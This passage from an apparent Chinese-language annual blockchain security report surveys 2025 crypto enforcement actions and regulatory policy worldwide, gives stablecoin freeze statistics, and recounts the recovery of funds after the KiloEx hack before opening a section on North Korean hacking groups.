Group)在美资产,相关交易受禁。10月30日,据财新报道,陈志因涉嫌运营跨国电诈团伙,新加坡警方对其及同伙采取行动,冻结资产总额超1.5亿新元,包括6处房产、银行与证券账户、现金,并查封游艇、11辆汽车及多瓶酒类。12月2日,美国司法部查封诈骗网站tickmilleas[.]com,该域名由缅甸“太昌诈骗园区”运营,用于伪装加密交易平台诱骗投资者,该行动与此前被制裁的Huione Group相关。 - 11月6日,西班牙国民卫队逮捕了一名涉嫌主导2.6亿欧元加密货币庞氏骗局的犯罪嫌疑人。该嫌疑人运营的“马德拉投资俱乐部”通过承诺与数字艺术、豪华资产和加密货币挂钩的高额回报,吸引超过3000名受害者。调查涉及Europol及多国执法机构,揭示出横跨至少10个国家的空壳公司和银行账户网络。 (4)加密服务合规失范与非法经营处罚 - 2月28日,英国金融行为监管局(FCA)起诉Olumide Osunkoya非法运营加密ATM网络,指控其通过GidiPlusLtd在多个地点运营未注册ATM,处理交易金额约260万英镑,Osunkoya成为英国首位因非法运营加密ATM网络而被刑事起诉并认罪的个人。 - 7月4日,土耳其资本市场委员会(CMB)以“未经授权提供加密资产服务”为由,对去中心化交易平台 PancakeSwap 实施访问封锁,这是土耳其首次针对 DEX 采取监管封禁措施,同时被禁的还包括加密比价平台 CryptoRadar。 - 9月18日,加拿大皇家骑警(RCMP)宣布从加密交易所TradeOgre查扣超过5600万美元的加密资产,创下该国最大规模的加密资产查扣纪录。调查发现,该平台未依法注册、未执行客户身份核验,长期为犯罪资金流转提供便利。 - 12月9日,比特币P2P市场运营商Paxful Holdings Inc.因反洗钱失职问题同意就美国联邦指控认罪,并向美国司法部支付刑事罚款。司法部指出,该平台在明知存在犯罪活动的情况下,未依法提交可疑交易报告,并对其反洗钱政策作出误导性陈述。 # 3.1.2 监管政策 # 3.1.2.1 亚洲 (1)中国大陆 - 2025年中国大陆法院共计有853个关于虚拟币的判决,其中刑事判决568起,民事判决282起。 - 2025-01-01:新修订的《中华人民共和国反洗钱法》施行。最高检强调,要一体贯彻反洗钱法和刑法“洗钱罪”等规定,准确适用“两高”相关司法解释,深化打击治理洗钱违法犯罪三年行动,依法惩治洗钱及相关犯罪,增强打击利用虚拟货币等新技术、新产品、新业务等实施洗钱犯罪的能力,形成打击合力。 - 2025-06-18:《人民法院报》刊登广东省深圳市中级人民法院文章,文中指出司法实践中已基本形成虚拟货币具有财产属性的共识。在涉案处置方面,探索通过备案监管下的合规路径,将涉案虚拟货币兑换为法币;对于被用于危害国家安全的隐私币等虚拟资产,可发送至“黑洞地址”予以销毁,永久退出流通。 - 2025-11-28:中国人民银行、金融监管总局、中国证监会正式公布《金融机构客户尽职调查和客户身份资料及交易记录保存管理办法》,自2026年1月1日起施行。办法指出,金融机构应当按照安全、准确、完整、保密的原则,妥善保存客户身份资料及交易记录,确保足以重现每笔交易,以提供客户尽职调查、监测分析交易、调查可疑交易活动以及查处洗钱、恐怖融资案件所需的信息。 (2)中国香港 - 2025-02-19:香港证监会正式发布新制定的「ASPIRe」路线图,提出五大支柱(包括连接Access、保障 Safeguards、产品 Products、基建 Infrastructure 和联系 Relationships)下的12项主要举措,涵盖接入全球流动性、安全监管、产品创新、基础设施升级及国际合作等方面。 - 2025-05-21: 香港立法会三读通过《稳定币条例草案》, 香港特区政府于 2025 年 5 月 30 日刊宪《稳定币条例》, 指定 2025 年 8 月 1 日为《稳定币条例》(第 656 章)开始实施的日期。届时, 机构可向金管局申请成为合规稳定币发行商。香港的稳定币以法定货币作为基础资产。 - 2025-06-26: 香港政府发布《香港数字资产发展政策宣言 2.0》, 重申将香港打造成数字资产领域全球创新中心的承诺。该政策宣言提出 LEAP 框架, 包括优化法律与监管、扩展代币化产品种类、推进应用场景与跨界别合作以及人才与合作伙伴发展四大重点。 - 2025-11-21: 香港金管局发布《关于政治公众人物的风险为本反洗钱及反恐怖融资管控指引》,并表示将把认可机构及储值支付工具持牌人对本指引所载标准的实施情况,纳入其反洗钱及反恐怖融资监管范畴进行监测。 - 2025-12-12: 香港金管局发布《打击高端洗钱活动指引》,针对当前洗钱及恐怖分子资金筹集活动呈现复杂化、高端化的新趋势,向所有认可机构提出具体改进要求。 - 2025-12-24: 香港财政事务及库务局与香港证监会联合公布虚拟资产交易及托管服务发牌制度咨询总结,市场普遍支持将该类服务纳入监管体系。新制度将比照传统证券监管架构,重点关注托管私钥等核心风险控制。两机构同时展开为期一个月的进一步公众咨询,拟就提供虚拟资产意见及管理服务的机构设立独立发牌制度,预计2026年提交立法会审议。 # (3)中国台湾 - 2025-03-25:台湾金管会发布「虚拟资产服务法」草案,进行为期60天公众咨询。草案主要内容包括明确虚拟资产服务商许可制度、规范服务商经营管理要求、建立稳定币发行管理框架、设立反欺诈与市场操纵规定、制定违法处罚条例等。 # (4)韩国 - 2025-01-15:韩国金融服务委员会(FSC)已开始讨论制定第二阶段加密货币监管框架,计划于今年下半年起草相关法案。拟定框架包括提升代币上架透明度、加密企业信息披露义务、稳定币储备与赎回监管等内容。值得注意的是,韩国首个加密货币监管框架已于去年7月生效,其中要求服务提供商将至少 $80\%$ 的用户加密货币存款存放在冷钱包中,与其自有资金分开保管。 - 2025-11-24:韩国《电子证券法》和《资本市场法》修正案通过国会政务委员会法案审查小组审议,标志着代币证券(STO)制度化迈出关键一步。 # (5) 新加坡 - 2025-05-30:新加坡金融管理局(MAS)发布最终政策文件。其中规定所有在新加坡注册或运营的加密服务提供商, 若未取得 DTSP 牌照须在 2025 年 6 月 30 日前停止向境外客户提供加密货币服务。6 月 12 日, 新加坡监管机构敦促非持牌加密交易平台尽快退出该国运营。 # (6)越南 - 2025-06-14:越南国民议会批准了《数字技术产业法》,该法案将数字资产纳入监管范围,并正式承认加密资产的合法地位。该法案将于2026年1月1日生效,将加密资产定义为在创建、发行、存储或转移过程中使用加密或类似数字技术进行验证的数字资产,并将数字资产分为虚拟资产和加密资产两类。 # (7) 泰国 - 2025-03-16: 泰国金融监管机构证券交易委员会 (SEC) 将稳定币 USDC、USDT 添加到批准的加密货币中。在此之前,该监管机构仅批准了 BTC、ETH、XRP、XLM 以及泰国银行结算系统中使用的某些代币。 - 2025-04-08:泰国内阁批准修订数字资产业务和网络犯罪预防相关法令。新规将限制外国加密货币点对点(P2P)交易平台在泰国的运营,违规者将面临最高三年监禁、最高30万泰铢罚款或两者并罚。 # (8) 日本 - 2025-10-15:日本监管机构计划禁止加密货币领域的内幕交易。该国最高金融监管机构——证券交易监督委员会,即将获权调查相关违规行为,针对利用未公开信息交易者,可提出追加罚款建议或移交刑事调查。此前,内幕交易规定未覆盖数字资产领域。日本金融厅将商讨新规细节,力求2026年通过新法案。 - 2025-12-10: 日本金融厅(FSA)发布报告,计划将加密资产监管从《支付服务法》(PSA)转移至《金融商品交易法》(FIEA),将其视为投资产品进行监管。该举将加强IEO信息披露要求,并赋予监管机构更多打击未注册平台的权力,特别是境外和DeFi相关项目,同时引入禁止内幕交易条款。 - 2025-12-23:日本政府拟于2026年提交法案,推动地方债以区块链形式数字证券化。该举措旨在实现债券无中介快速发行与结算,并可实时掌握投资者信息。相关方案或包括使用地银稳定币支付利息、赋予投资人地方设施使用权等,兼顾金钱、特典与社会性回报,或将开启低成本地方融资新路径。 # 3.1.2.2欧洲 # (1)英国 - 2025-01-31:修订后的英国财政部《金融服务和市场法案》(FSMA)生效,将加密货币质押排除在集体投资计划的分类之外。根据这一变更,质押以ETH和SOL将仅被视为区块链验证过程,不再受适用于集体投资计划的监管要求约束。 - 2025-04-29:英国财政大臣在伦敦举行的英国金融科技周重要峰会上透露,英国已公布了监管加密资产的立法草案,根据新规,加密货币交易所、交易商和代理商将被纳入监管范围,严厉打击违规行为,同时支持合法创新。在英国拥有客户的加密货币公司也必须满足透明度、消费者保护和运营韧性方面的明确标准。 - 2025-11-29:英国税务海关总署(HMRC)发布新规,在英国运营的加密货币交易所必须从2026年1月1日起开始收集其所有英国客户的完整交易记录,并在次年与英国税务海关总署共享,HMRC将使用收集到的数据来核对纳税申报表,确保合规性,并对违规行为进行处罚。英国税务海关总署的新指南使英国与经合组织加密资产报告框架(CARF)保持一 致,该框架旨在提高快速增长的数字资产市场的透明度,目前已在欧盟、加拿大、澳大利亚、日本和韩国等国家和地区推广。 - 2025-12-03:英国正式将加密资产(如加密货币和稳定币)作为财产纳入法律保护。此举为数字资产提供更清晰的法律基础, 尤其在所有权证明、追回被盗资产以及破产或遗产处理方面。 - 2025-12-15:英国财政部正制定新规,将自2027年起把加密货币纳入金融行为监管局(FCA)监管框架,使其比照其他金融产品监管。 - 2025-12-16:英国金融行为监管局(FCA)发布了咨询文件CP25/40《监管加密资产活动》,标志着英国对加密资产领域的监管框架进一步完善。 # (2)欧盟 - 2025-02-17:欧洲证券和市场管理局(ESMA)发布征求意见稿,就加密资产服务提供商员工能力评估指南征求公众意见。该指南旨在落实《加密资产市场监管法案》(MiCA)相关要求。 - 2025-05-02:欧盟正式通过《反洗钱条例》(AMLR),将自2027年7月1日起禁止所有金融机构与加密服务商提供匿名加密账户或钱包,并全面禁用隐私币(如Monero、Zcash、Dash)交易。 - 2025-12-24:欧盟最新的数字资产税务透明度法案将于1月1日生效。该指令被称为DAC8,它将欧盟长期以来在税务方面开展的行政合作框架扩展到加密资产及相关服务提供商。该指令要求包括交易所和经纪商在内的加密资产服务提供商收集并向各国税务机关报告详细的用户和交易信息。随后,各国税务机关将在欧盟成员国之间共享这些数据。 # (3)土耳其 - 2025-03-13: 土耳其资本市场委员会 (CMB) 发布了两份与 CASP 许可和运营相关的监管文件, 包括加密货币交易所、托管人和钱包服务提供商。该框架授予 CMB 对加密平台的全面监督权, 确保遵守国家和国际标准。 # 3.1.2.3 北美洲 # (1)美国 - 2025-01-23:美国总统特朗普签署加密货币行政令,确立支持数字资产和区块链技术发展的立场,其中包括建立总统数字资产市场工作组。此外,该行政令禁止各机构采取任何行动建立、发行或推广央行数字货币(CBDC)。 - 2025-04-02:美国众议院金融服务委员会以32票赞成、17票反对通过《STABLE法案》,旨在为美元稳定币建立监管框架。法案要求稳定币1:1储备、满足资本及反洗钱标准。法案对外国发行商如Tether设两年过渡期,之后需遵守美国规则。 - 2025-04-04:美国证券交易委员会(SEC)企业财务部门发布关于稳定币的指导意见。经综合权衡,该部门认为完全储备、流动性强、由美元支持的稳定币(Covered Stablecoins)根据Reves测试不构成证券,简言之,发行与销售稳定币旨在促进商业或消费用途。 - 2025-04-09:美国司法部发布关于加密货币法律的官方声明,明确开发者不对代码被犯罪分子使用负责,执法重点转向欺诈、恐怖主义融资等真正犯罪行为。 - 2025-04-11:美国证券交易委员会(SEC)财务部发布声明,针对加密市场的证券发行和注册,要求发行商披露业务发展阶段、网络功能、证券权利及智能合约代码等信息,以保护投资者并促进市场透明。 - 2025-05-29:美国众议院共和党人正式提出《Digital Asset Market Clarity Act》,该法案赋予商品期货交易委员会(CFTC)对数字商品现货市场的独家监管权,并允许加密平台根据其业务性质向CFTC或SEC注册。法案明确规定支付型稳定币不属于证券,并豁免去中心化金融运营商和钱包服务提供商接受SEC监管。 - 2025-06-18:美国参议院以68票赞成、30票反对的结果通过了具有里程碑意义的加密货币立法《GENIUS法案》,标志美国首次通过涵盖全面监管改革的数字资产立法。 - 2025-07-17:美国众议院悉数通过了《指导与建立美元稳定币国家创新法案》(简称《GENIUS法案》)《2025数字资产市场清晰法案》(简称《CLARITY法案》)、《反CBDC监控国 家法案》(Anti-CBDC Surveillance State Act)三项加密货币相关法案。《GENIUS法案》已由特朗普签署正式成为法律,《CLARITY法案》和《反CBDC监控国家法案》将送往参议院审议,三项法案加速推进标志着美国对加密货币从“监管模糊”向“框架构建”的战略转折。 - 2025-12-18:美国证券交易委员会(SEC)交易与市场部发布关于加密资产与分布式账本技术(DLT)活动的常见问题解答(FAQs),旨在为市场参与者提供合规指引。内容涵盖经纪自营商责任、客户资产保障、双资产交易对、转账代理人与 DLT 和清算结算与 ETP 等核心领域。 - 2025-12-18:美国SEC交易与市场部发布《关于经纪交易商托管加密资产证券的声明》。该声明旨在阐明《证券交易法》规则15c3-3(b)(1)对作为证券的加密资产(即“加密资产证券”)的适用性,适用于为客户持有此类资产的经纪交易商。 此外,多个州(如新罕布什尔、怀俄明、犹他等)推进比特币战略储备相关法案。 # (2)特立尼达和多巴哥 - 2025-11-23:特立尼达和多巴哥议会通过《2025年虚拟资产及虚拟资产服务提供商法案》,旨在为加勒比地区虚拟资产业务的许可与监管提供统一框架。 # 3.1.2.4 拉丁美洲 # (1) 阿根廷 - 2025-03-13: 阿根廷国家证券委员会 (CNV) 批准第 1058 号决议, 为虚拟资产服务提供商 (VASP) 设立最终监管准则, 涵盖注册义务、网络安全、资产托管、反洗钱措施及风险披露义务等方面, 强调监管与创新平衡。 # (2) 萨尔瓦多 - 2025-01-30: 萨尔瓦多国会通过总统关于国家比特币法的改革提案, 正式取消比特币作为法定货币的地位。 # 3.1.2.5 中东 # (1)迪拜 - 2025-03-17:迪拜金融服务管理局(DFSA)启动代币化监管沙盒,为企业在监管机构的监督下测试代币化金融解决方案提供了一个受控环境,符合条件的服务包括代币化股票、债券、伊斯兰债券以及集体投资基金单位。 - 2025-05-19:迪拜虚拟资产监管局(VARA)更新了数字资产交易规则手册。新规加强了对保证金交易的杠杆控制和抵押要求。此次更新旨在使监管框架与国际风险标准接轨,并填补此前对经纪商、钱包服务商等领域的监管空白。 - 2025-05-25:迪拜金融服务管理局(DFSA)正式批准Circle旗下稳定币USD Coin和EURC为首批获认可稳定币。新规定将使迪拜国际金融中心(DIFC)内企业能在支付、资金管理等多项数字资产应用中使用这两种稳定币。 # 3.1.2.6非洲 # (1)加纳 - 2025-12-22:加纳议会批准了加密货币合法化法案, 此举旨在回应加纳央行对比特币在该国日益广泛且不受监管的使用情况的担忧。 # 3.1.2.7大洋洲 # (1)澳大利亚 - 2025-09-25: 澳大利亚政府发布加密资产平台监管草案, 拟将金融服务法律扩展至加密行业。草案要求运营方获得澳大利亚金融服务牌照, 设立数字资产平台和托管平台两类, 需管理利益冲突、提供纠纷解决机制, 并满足托管与结算标准。新规涵盖包装代币、公共代币基础设施及质押业务, 赋予监管机构灵活调整权力。 - 2025-10-29:澳大利亚金融监管机构ASIC对其指南进行重大更新,明确数字资产产品和服务在何种情况下构成《公司法》下的金融产品,并将术语从"加密资产"扩展为涵盖虚拟资产、通证化产品和币基资产的"数字资产"。虽未制定新法,但该指南旨在为财政部《数字资产平台与支付服务提供商法案》实施前提供确定性,该法案将为交易所、托管方和稳定币发行方引入许可制度。ASIC重申,收益型代币、质押计划和资产挂钩稳定币等需持牌经营。最终版指南新增5个案例至18个,涵盖交易所代币、游戏NFT到质押服务等场景, 并明确托管方需满足1000万澳元净资产门槛(除非为附带性服务)。ASIC强调,澳法律适用于向本地用户营销的离岸机构,全球平台不得以地理位置规避监管。 整体来看,2025年全球加密资产监管进入结构化、体系化推进阶段,各国政策从过去的“试探式监管”逐步迈向“清晰规则落地与统一框架建设”。合规被视为加密市场发展的前提,税务透明、AML/KYC、托管安全、信息披露与稳定币监管成为2025年政策高频关键词,全球监管框架正从“监管是否需要”转向“监管如何执行”。 # 3.2 资金冻结 / 归还数据 2025年,Tether共冻结576个ETH地址上的USDT-ERC20资产。 2025年,Circle共冻结214个ETH地址上的USDC-ERC20资产。 USDT - Banned Addresses Over time @phabc 2025年遭受攻击后仍能收回或冻结损失资金的事件共有18起。在这18起事件中,被盗资金总计约19.57亿美元,其中将近3.87亿美元被返还/冻结,占2025年总损失的 $13.2\%$ 。这一比例背后离不开多方协作应对和链上追踪能力的不断进步。 此外,在慢雾InMistLab威胁情报合作网络的大力支持下,2025年慢雾(SlowMist)协助客户、合作伙伴及公开被黑事件冻结/追回资金约1,929万美元。 其中较具代表性的案例是KiloEx事件——2025年4月15日,去中心化永续合约交易平台KiloEx遭遇黑客攻击,损失约844万美元。事件发生后,慢雾(SlowMist)第一时间组织安全应急小组,联合KiloEx梳理攻击路径和资金流向,同时,依托自研的链上反洗钱追踪分析平台MistTrack与InMist威胁情报网络,完成对攻击者信息和特征的画像提取,并协助项目方与攻击者展开多轮谈判。最终,在慢雾(SlowMist)及多方协作下,事件发生仅3.5天后,全部被盗资产844万美元被成功追回,KiloEx与攻击者达成 $10\%$ 白帽赏金协议。 0x1D568fc0...D1222ABcF to KiloEX Exploiter 1 Let's make the deal, we will keep our promise, please contact me at operation@kiloex.io and attach signature using your address(You can use https://etherscan.io/verifiedSignatures or other popular tools). The content to be signed includes the email address you are currently using to contact me. at xn 0x4c2055066526... Apr-18-2025 01:55:35 AM UTC (3 days ago) KiloEX Exploiter 1 to 0x1D568fc0...D1222ABcF I need you to withdraw the case first and upload the withdrawal notice to x at txn 0x462edad47ecf4... Apr-17-2025 09:25:11 PM UTC (3 days ago) KiloEX Exploiter 1 to 0x1D568fc0...D1222ABcF ? at txn 0x717776436451... Apr-17-2025 05:46:23 PM UTC (3 days ago) KiloEX Exploiter 1 to KiloEX Exploiter 1 Let's make a deal? at xn 0xa78d590f07136... Apr-17-2025 04:37:59 PM UTC (3 days ago) 0x1D568fc0...D1222ABcF to KiloEX Exploiter 1 白帽黑客,你好: 我们目前已经立案,已经发现了有关您活动的关键信息。 我们正在积极监控您的地址(0x551f3110f12c763d1611d5a63b5f015d1c1a954c,0x0fac92881556a90fdb19eae9f23640b95b4cbd,0xd43b395efad4877e94e06b980f4ed0536748bf3),并且已经联系诸多合作伙伴将地址加入了黑名单或者冻结。 为了友好解决这一问题,我们建议: 1. 在24小时内将 $90\%$ 的被盗资金返还给以下地址,并保留 $10\%$ 作为发现漏洞的白帽赏金奖励。opBNB: 0xb1a95732ed3c75f7b1dc594a357f7a957e9baad2... View More at txn 0xa6031b4ef8e2b... Apr-16-2025 04:17:23 PM UTC (4 days ago) 0x1D568fc0...D1222ABcF to KiloEX Exploiter 1 To Hacker: Our investigation, supported by law enforcement, cybersecurity agencies, and multiple exchanges & bridge protocols, has uncovered critical information about your activities. We are actively monitoring your addresses (0x551f3110f12c763d1611d5a63b5f015d1c1a954c, 0x00fac92881556a90fdb19eae9f23640b95b4cbd, 0xd43b395efad4877e94e06b980f4ed0536748bf3) and are prepared to freeze the stolen funds promptly. To resolve this matter amicably, we propose: 1. Return $90\%$ of the stolen funds to the following addresses within 72 hours, and keep $10\%$ as a whitehat bounty for your cooperation.... View More at txn 0x8c052f2770c2... Apr-15-2025 03:08:59 PM UTC (5 days ago) 从快速响应、全额追回到后续的审计与防护加固,KiloEx与慢雾的联合应急不仅展现了安全团队与项目方协作的重要性,也再次提醒Web3项目,安全不应止步于上线前的审计,事中监控与事后应急同样重要。 # 3.3 网络犯罪组织与地下网络生态 # 3.3.1 朝鲜黑客 # (1)从“单点攻击”到“高度组织化” 过去几年,朝鲜(DPRK)相关黑客活动明显不再是零散的网络入侵或偶发的交易所盗窃事件,而是逐步演化为一套高度组织化、长期运作、以加密资产为核心的资金获取与洗钱体系。多家安全公司、执法机构及区块链分析机构指出,朝鲜黑客已成为当前全球加密行业面临的最系统性、最具持续性的反洗钱风险之一,其活动规模、技术复杂度及资金运作成熟度均显著高于一般网络犯罪组织。 根据MSMT于2025年发布的研究报告,自2024年1月至2025年9月期间,朝鲜相关黑客组织通过攻击全球范围内的加密货币交易所、钱包服务商、多签基础设施及Web3生态相关企业,累计窃取至少28.37亿美元的加密资产。其中,仅2025年前九个月的盗取金额即达到约16.45亿美元,刷新历史纪录。 Table 1: Total Cryptocurrency Stolen by the DPRK, 2024 - 2025 <table><tr><td>Dates</td><td>Total DPRK Cryptocurrency Theft</td></tr><tr><td>January 2024 – December 2024</td><td>$ 1,191,554,000</td></tr><tr><td>January 2025 – September 2025</td><td>$ 1,645,780,000</td></tr><tr><td>January 2024 – September 2025</td><td>$ 2,837,334,000</td></tr></table> # (2)主要组织与角色分工 公开情报、执法文件及安全公司披露的信息显示,朝鲜的加密相关网络犯罪体系并非由单一组织孤立完成,而是由多个长期被追踪的高级持续性威胁(APT)组织、境外IT外包网络以及洗钱节点共同参与,逐步形成覆盖"攻击-洗钱-兑现-再回流"的完整闭环。 在核心层面,Lazarus Group仍是最活跃、最具破坏力的攻击主体,长期针对加密交易所、托管钱包、开发者基础设施及供应链实施攻击。2025年2月发生的Bybit超14.6亿美元被盗事件,已被美国联邦调查局(FBI)归因于Lazarus Group,并在执法文件中将该系列恶意行动命名为“TraderTraitor”。 # Public Service Announcement # FEDERAL BUREAU OF INVEST